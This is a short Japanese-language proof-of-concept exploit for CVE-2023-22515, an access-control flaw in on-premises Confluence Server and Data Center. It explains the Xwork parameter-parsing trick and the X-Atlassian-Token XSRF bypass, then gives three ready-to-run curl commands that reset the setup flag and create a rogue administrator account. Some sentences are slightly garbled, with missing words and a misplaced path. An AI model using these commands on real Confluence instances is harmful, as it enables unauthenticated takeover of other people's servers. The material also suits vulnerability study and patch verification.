
CVE-2023-22515の概念実証エクスプロイト。Confluence ServerおよびData Centerにおける重大なアクセス制御の脆弱性で、認証なしの管理者乗っ取りを可能にします。
CVE-2023-22515 は、オンプレミス版の Confluence Server および Confluence Data Center に影響を与える深刻な脆弱性であり、不適切なアクセス制御の脆弱性です。Atlassian は CVSS 基本スコア 10.0 を割り当てています。
1- Xwork インターセプターによるパラメーター解析の仕組みにより、/test.action?one=a は setOne()='a' と等価になり、別の例として /test.action?one.two=a は getOne().setTwo()="a" と等価になります。
2- /setup/* エンドポイントには @ParameterSafe 呼び出しが含まれており、/setup/setupdb.action?dbConfigInfo.databaseType=postgresql のように set および get を使用できます。ただし、セットアップが完了しているため エンドポイントはブロックされているため、代わりに を使用できます。
/setup/*/server-info.action3- セットアップ完了のための set メソッドを見つける => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);
4- X-Atlassian-Token ヘッダーを使用して XSRF をバイパスします。
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
免責事項: このエクスプロイトは私が発見または作成したものではありません。以下の記事に帰属します。